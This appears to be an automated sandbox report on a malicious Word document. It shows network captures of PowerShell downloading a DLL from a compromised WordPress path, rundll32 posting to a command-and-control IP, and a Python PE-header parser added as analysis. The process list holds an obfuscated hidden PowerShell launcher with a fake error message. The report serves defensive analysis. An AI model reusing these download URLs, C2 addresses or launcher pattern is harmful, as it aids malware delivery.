
                                      TCP Packets

Timestamp                           Source Port   Dest Port   Source IP       Dest IP
Jan 6, 2021 08:49:13.615979910 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.693485022 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.693684101 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.699331999 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.808119059 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808175087 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808206081 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808227062 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.808237076 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808267117 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808280945 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.808304071 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808339119 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808341026 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.808373928 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808407068 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808409929 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.808442116 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.808479071 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882118940 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882172108 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882200956 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882222891 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882225037 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882266045 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882276058 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882293940 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882318974 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882334948 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882344961 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882373095 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882381916 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882401943 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882426023 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882437944 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882450104 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882467031 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882493973 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882496119 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882524014 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882535934 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882548094 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882575989 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882590055 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882601023 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882623911 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882648945 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.882654905 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.882695913 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.957150936 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957180977 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957206964 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957227945 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957248926 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957263947 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957289934 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957308054 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957307100 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.957324982 CET  80            49167       176.53.69.151   192.168.2.22
Jan 6, 2021 08:49:13.957349062 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.957354069 CET  49167         80          192.168.2.22    176.53.69.151
Jan 6, 2021 08:49:13.957357883 CET  80            49167       176.53.69.151   192.168.2.22
                                      Jan 6, 2021 08:49:13.957380056 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957415104 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957437038 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957437038 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957457066 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957479954 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957479954 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957505941 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957521915 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957525969 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957549095 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957564116 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957570076 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957590103 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957607031 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957612038 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957633018 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957647085 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957653046 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957676888 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957688093 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957700968 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957726002 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957741022 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957751989 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957776070 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957792044 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957801104 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957825899 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957849979 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957858086 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957875967 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957889080 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957902908 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957926989 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957946062 CET4916780192.168.2.22176.53.69.151
                                      Jan 6, 2021 08:49:13.957952023 CET8049167176.53.69.151192.168.2.22
                                      Jan 6, 2021 08:49:13.957977057 CET8049167176.53.69.151192.168.2.22

                                      UDP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Jan 6, 2021 08:49:13.475481987 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                                      Jan 6, 2021 08:49:13.579385996 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22

                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Jan 6, 2021 08:49:13.475481987 CET | 192.168.2.22 | 8.8.8.8 | 0x80ac | Standard query (0) | petafilm.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Jan 6, 2021 08:49:13.579385996 CET | 8.8.8.8 | 192.168.2.22 | 0x80ac | No error (0) | petafilm.com | | 176.53.69.151 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • petafilm.com
                                      • 5.2.136.90

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.22 | 49167 | 176.53.69.151 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Jan 6, 2021 08:49:13.699331999 CET | 0 | OUT | GET /wp-admin/4m/ HTTP/1.1
                                      Host: petafilm.com
                                      Connection: Keep-Alive
                                      Jan 6, 2021 08:49:13.808119059 CET | 1 | IN | HTTP/1.1 200 OK
                                      Cache-Control: no-cache, must-revalidate
                                      Pragma: no-cache
                                      Content-Type: application/octet-stream
                                      Expires: Wed, 06 Jan 2021 07:49:24 GMT
                                      Last-Modified: Wed, 06 Jan 2021 07:49:24 GMT
                                      Server: Microsoft-IIS/10.0
                                      Set-Cookie: 5ff56b8489beb=1609919364; expires=Wed, 06-Jan-2021 07:50:24 GMT; Max-Age=60; path=/
                                      Content-Disposition: attachment; filename="QieaYu0XHj8.dll"
                                      Content-Transfer-Encoding: binary
                                      X-Powered-By: ASP.NET
                                      X-Powered-By-Plesk: PleskWin
                                      Date: Wed, 06 Jan 2021 07:49:23 GMT
                                      Content-Length: 192000
                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 95 16 3a bb d1 77 54 e8 d1 77 54 e8 d1 77 54 e8 15 b2 99 e8 dc 77 54 e8 15 b2 9a e8 8e 77 54 e8 15 b2 9b e8 f8 77 54 e8 2d 00 eb e8 d0 77 54 e8 2d 00 e8 e8 d3 77 54 e8 d1 77 55 e8 53 77 54 e8 2d 00 ed e8 c0 77 54 e8 f6 b1 9b e8 d5 77 54 e8 f6 b1 9e e8 d0 77 54 e8 f6 b1 9d e8 d0 77 54 e8 d1 77 c3 e8 d0 77 54 e8 f6 b1 98 e8 d0 77 54 e8 52 69 63 68 d1 77 54 e8 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00 00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00 8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00 00 b4 01 00 00 1e 01 00 00 00 
00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
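The hex dump above is the first few hundred bytes of the file the server labelled QieaYu0XHj8.dll, and that is enough to parse the PE headers without touching the sample. The Python below is an added example, not part of the Joe Sandbox report: it embeds the bytes copied from the "Data Raw" line (with the DOS stub and Rich header region at 0x40-0xff zero-filled, since nothing in the walk reads them) and follows DOS header, e_lfanew, COFF header, PE32 optional header, data directories and section table, checking each signature as it goes. The check worth keeping from it: the raw extent of the last section must equal the Content-Length the server sent (192000); a mismatch would mean a truncated download or data appended after the image.

```python
import struct
from datetime import datetime, timezone

# Bytes copied from the report's "Data Raw" capture of the HTTP response body:
# DOS header (0x00-0x3f) and PE signature, COFF header, PE32 optional header,
# data directories and section table (0x100-0x2bf). Bytes 0x40-0xff (DOS stub
# text and Rich header) are zero-filled here; the parser never reads them.
DOS_HEADER_HEX = """
4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00
"""
NT_HEADERS_HEX = """
50 45 00 00 4c 01 05 00 ff a1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 be 00 00
00 4a 02 00 00 00 00 00 dc 45 00 00 00 10 00 00 00 d0 00 00 00 00 00 10 00 10 00 00 00 02 00 00
06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 03 00 00 04 00 00 00 00 00 00 02 00 00 01
00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 19 01 00 cb 00 00 00
8c 0f 01 00 b4 00 00 00 00 50 01 00 20 b2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 10 03 00 a0 0c 00 00 10 d2 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 08 05 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 c8 01 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00
19 bd 00 00 00 10 00 00 00 be 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60
2e 72 64 61 74 61 00 00 bb 4a 00 00 00 d0 00 00 00 4c 00 00 00 c2 00 00 00 00 00 00 00 00 00 00
00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 9c 2d 00 00 00 20 01 00 00 10 00 00 00 0e 01 00
00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 b2 01 00 00 50 01 00
00 b4 01 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00
48 1a 00 00 00 10 03 00 00 1c 00 00 00 d2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42
"""


def _unhex(dump: str) -> bytes:
    return bytes.fromhex("".join(dump.split()))


CAPTURE = _unhex(DOS_HEADER_HEX) + bytes(0xC0) + _unhex(NT_HEADERS_HEX)

MACHINE = {0x014C: "i386", 0x8664: "x86-64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
COFF_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
DIR_NAMES = ["export", "import", "resource", "exception", "security", "basereloc", "debug",
             "architecture", "globalptr", "tls", "load_config", "bound_import", "iat",
             "delay_import", "clr", "reserved"]


def parse_pe_headers(buf: bytes) -> dict:
    """DOS header -> e_lfanew -> COFF header -> PE32 optional header -> directories -> sections."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    machine, nsect, stamp, _symtab, _nsyms, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    (magic,) = struct.unpack_from("<H", buf, opt)
    if magic != 0x10B:
        raise ValueError("only PE32 (0x10b) is handled here, got 0x%x" % magic)
    (entry,) = struct.unpack_from("<I", buf, opt + 16)
    (image_base,) = struct.unpack_from("<I", buf, opt + 28)
    (size_of_image,) = struct.unpack_from("<I", buf, opt + 56)
    subsystem, dll_chars = struct.unpack_from("<HH", buf, opt + 68)
    (ndirs,) = struct.unpack_from("<I", buf, opt + 92)
    dirs = {}
    for i in range(min(ndirs, len(DIR_NAMES))):
        dirs[DIR_NAMES[i]] = struct.unpack_from("<II", buf, opt + 96 + 8 * i)  # (rva, size)
    sections = []
    for i in range(nsect):  # section table starts right after the optional header
        name, vsize, va, rsize, rptr, _, _, _, _, sflags = struct.unpack_from(
            "<8sIIIIIIHHI", buf, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "vsize": vsize, "va": va,
                         "raw_size": rsize, "raw_ptr": rptr, "flags": sflags})
    return {
        "machine": MACHINE.get(machine, hex(machine)),
        "compiled_utc": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "coff_flags": [n for bit, n in COFF_FLAGS.items() if chars & bit],
        "is_dll": bool(chars & 0x2000),
        "entry_point": entry,
        "image_base": image_base,
        "size_of_image": size_of_image,
        "subsystem": subsystem,
        "dll_flags": [n for bit, n in DLL_FLAGS.items() if dll_chars & bit],
        "directories": dirs,
        "sections": sections,
    }


def expected_file_size(hdr: dict) -> int:
    """File length implied by the section table, to compare with Content-Length."""
    return max(s["raw_ptr"] + s["raw_size"] for s in hdr["sections"])


if __name__ == "__main__":
    hdr = parse_pe_headers(CAPTURE)
    for k, v in hdr.items():
        print(k, v)
    print("section table implies", expected_file_size(hdr), "bytes; server sent 192000")
```

For this capture the walk yields an i386 PE32 DLL (characteristics 0x2102), link timestamp 2021-01-04 23:17:19 UTC, preferred base 0x10000000 with NX_COMPAT set but not DYNAMIC_BASE, an export directory at RVA 0x119f0 (where rundll32 will later look for Control_RunDLL), five sections, and a .reloc section ending at 0x2ee00, which is exactly the 192000 bytes in Content-Length.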


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      1 | 192.168.2.22 | 49168 | 5.2.136.90 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Jan 6, 2021 08:49:32.588160992 CET | 200 | OUT | POST /76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/ HTTP/1.1
                                      DNT: 0
                                      Referer: 5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
                                      Content-Type: multipart/form-data; boundary=--------------sArhAY1ugWdoQV
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                      Host: 5.2.136.90
                                      Content-Length: 5940
                                      Connection: Keep-Alive
                                      Cache-Control: no-cache
                                      Jan 6, 2021 08:49:33.304199934 CET | 208 | IN | HTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Wed, 06 Jan 2021 07:49:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Data Raw: 66 38 34 0d 0a 53 97 06 1b 16 33 39 9f c1 09 dd 4d cb a3 a4 db a9 1c 20 be 0c 9c 93 80 84 b3 8b 03 85 93 79 0e d0 96 17 ea e5 76 f1 b0 d4 3d 3b 72 42 22 68 03 8f 2f bd 76 75 31 b6 49 8f 43 f1 4a ee 61 7c e9 06 44 61 c2 a6 47 d7 39 bf 32 e7 08 35 c9 57 38 c3 0f 3c 9d 55 af af 54 ff c4 1d 40 01 e7 8c 38 e4 86 50 5e 04 3e 63 8e b6 66 29 e6 fd 66 e7 f1 bb fb b7 77 1a 0c 15 49 0e 3f 5d 14 f5 6c f4 c8 cd dc fb 3a bc ef 74 4f d2 c8 62 61 36 5c d4 15 3a a0 b1 ba 52 1b 50 1b 92 6f df b5 31 ac d5 a5 69 2a 16 0b 13 ff 98 d7 b7 aa 3a 6f 9c a5 5b 15 76 57 6a c4 06 d1 16 2f 44 34 ff 7d 55 d1 29 41 a3 f3 a2 4f c9 b3 2d 92 e1 fd 32 bb 13 52 e6 44 b5 69 15 8d 53 4c f9 1e 54 57 bd 93 a8 19 ea a5 f1 14 8a 4d e6 1e 7a 48 dd e2 53 47 20 34 c0 6d f6 2d 18 e3 e9 e5 fe 28 a8 24 51 e3 da 42 0d c7 bb dc 5c 6c 05 70 ff f2 8f 41 c6 c6 b3 b6 9d ef aa 75 89 69 1d 75 62 b7 d9 b0 14 cd 5c 19 7c 7a c1 de 9b da 53 45 12 77 0c c9 cb 16 74 9e 3f 4c 62 21 56 72 fc 8c f9 e1 ab f4 d0 46 9f d6 2e c8 f5 c0 c8 79 64 75 1e 11 1a 62 cf a1 31 4f 1e 74 78 72 a2 eb 3b 2b 86 73 0d 80 1b f9 6a 69 06 7d e3 10 d4 67 15 5c 92 a5 5d 1b 22 fe cf 5b 91 1f 04 33 70 cb 64 43 a3 a8 5f 32 ae fa fd 0d fc b4 10 bb 7e 7d 3e 97 55 55 cf c5 8d 2d 87 18 aa 99 ab 2d 07 2c 5c 07 8e 38 60 9f b0 99 e6 37 3e 74 ef ef 24 9b 0d fd 59 a6 f0 40 cc 06 8f 62 f1 75 03 70 10 98 41 32 ae f5 e7 26 4f ed 0c f3 3e a2 f8 e6 49 1c 52 41 1e 0f 62 08 8e 65 73 15 8d e0 e8 67 b5 10 a7 8d 18 67 d1 32 bd 3b a0 63 41 2c 02 1c 38 9b 97 03 2e 22 d6 05 c1 18 76 cd 69 bf b9 b9 43 f3 51 63 c7 58 7b 5f 46 d3 9a c9 9e 3b 62 1a be 49 7e 8f 0c 90 f9 44 2b 34 f8 7d 4a 23 2e 5b 3a 82 ea 02 5e 19 da 90 ab 46 56 01 82 0f 87 61 0a 5e b5 9f 22 ef b5 91 e7 4e 0d 95 1c 5d 50 a8 31 e2 8b 4b 0b 64 cd d2 73 48 d3 fd db d7 fc 6a e4 3e dc ff 2e 9b eb a1 14 1b c7 90 8b 94 4c 1c d6 64 ab c9 72 8e d4 f4 68 4b d7 6c 5a f4 d3 97 33 ca a5 e4 2d d2 77 eb 9f 3d 81 68 79 9a 7c 1e 16 5b b5 4e 1d 26 36 67 eb f7 de 24 c5 8c 26 95 06 b2 5a 
26 e6 2b 4e 93 a3 1a 3b b6 b0 be b1 82 08 d5 c9 c1 b6 59 56 c1 44 5d d3 bd 0d 76 06 58 14 dc 22 e8 c7 3e 71 5f c3 1e d3 5b 27 56 ba 9c ce 40 cc 36 87 18 69 b3 a3 0c 5a dc 0f 3c 22 3c d6 d8 58 c9 bc d2 95 23 85 71 e7 1a 42 2b c0 d9 af 3c dc 4b c8 50 54 e7 19 05 e5 f0 ab 52 18 e7 93 18 f2 ec eb f2 54 70 e2 89 ac bd 95 2b 41 e0 93 c7 92 da db 4e e9 bf a9 6d 78 99 b0 c3 96 99 60 19 d3 0f 20 4f 3f d8 c2 35 15 9a fe 60 7b ab 5e 4d b8 94 62 9a bb b4 27 da 91 ff 1d 37 a9 61 7e d2 13 93 50 bc 9c 6f 17 3d 6d b4 06 26 11 cc 09 5a 39 07 76 49 4b 23 fd 78 22 a8 78 1f a1 d1 32 c4 78 be ec 41 16 19 95 34 da f5 5c 38 3c 5c 3a 78 36 24 ed b0 a7 ef 19 2b 33 db 68 82 db 22 e1 45 22 1d 6f 7b fd a9 d5 6a 99 e5 0a 0e df 4e 39 6a 64 c8 52 a7 20 44 a6 e1 92 90 18 a9 18 f5 2c b2 75 85 3e f2 29 af 4a f3 48 d3 aa f9 df 3e fc c0 7e 7a 1d 04 9c f9 b6 5a 4c 86 7b c2 1e 29 7e 2a 3c 67 4c f2 57 97 6e af ae fa 4b 56 a2 13 96 68 0e e6 03 f6 c1 63 75 a7 f1 f9 6f 30 85 06 07 57 d0 95 3e 95 f0 f7 37 cf 13 cc bf e1 df 6b b5 ed e9 85 c7 43 64 9c 33 46 db f1 81 12 b9 89 6f 2b e5 92 28 74 07 cf 8b 22 c8 e1 65 f3 ef 76 6c 71 31 a3 d8 69 11 b0 48 9d 37 d9 bd 4b d8 3a 21 59 1c 7b 05 6c 4a 1f c4 f4 05 1a 3d 7d e0 a3 08 88 a2 55 0b 9b 55 08 b0 fc 02 18 b0 c5 eb 53 93 7e 6e fa 0e e9 08 25 ae 1a 67 98 6a 75 9f 83 79 3f 7f 7e 62 c7 6b ee f0 6b 3a 39 3b bb 21 fc 91 c3 d5 6b a8 a6 58 f3 ce 4b 98 a1 03 8f 47 a0 1a 65 92 2f dd 3f 59 f3 30 6a 40 a9 be e5 29 b7 e0 11 a7 15 fb 99 71 33 2d 93 ff fd 36 f1 08 ed 60 5a 16 c1 87 d5 5b 96 64
                                      Data Ascii: f84S39M yv=;rB"h/vu1ICJa|DaG925W8<UT@8P^>cf)fwI?]l:tOba6\:RPo1i*:o[vWj/D4}U)AO-2RDiSLTWMzHSG 4m-($QB\lpAuiub\|zSEwt?Lb!VrF.ydub1Otxr;+sji}g\]"[3pdC_2~}>UU--,\8`7>t$Y@bupA2&O>IRAbesgg2;cA,8."viCQcX{_F;bI~D+4}J#.[:^FVa^"N]P1KdsHj>.LdrhKlZ3-w=hy|[N&6g$&Z&+N;YVD]vX">q_['V@6iZ<"<X#qB+<KPTRTp+ANmx` O?5`{^Mb'7a~Po=m&Z9vIK#x"x2xA4\8<\:x6$+3h"E"o{jN9jdR D,u>)JH>~zZL{)~*<gLWnKVhcuo0W>7kCd3Fo+(t"evlq1iH7K:!Y{lJ=}UUS~n%gjuy?~bkk:9;!kXKGe/?Y0j@)q3-6`Z[d


                                      Code Manipulations

                                      Statistics

                                      Behavior


                                      System Behavior

                                      General

                                      Start time:08:48:38
                                      Start date:06/01/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                      Imagebase:0x13f920000
                                      File size:1424032 bytes
                                      MD5 hash:95C38D04597050285A18F66039EDB456
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:08:48:40
                                      Start date:06/01/2021
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD 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
                                      Imagebase:0x49ee0000
                                      File size:345088 bytes
                                      MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
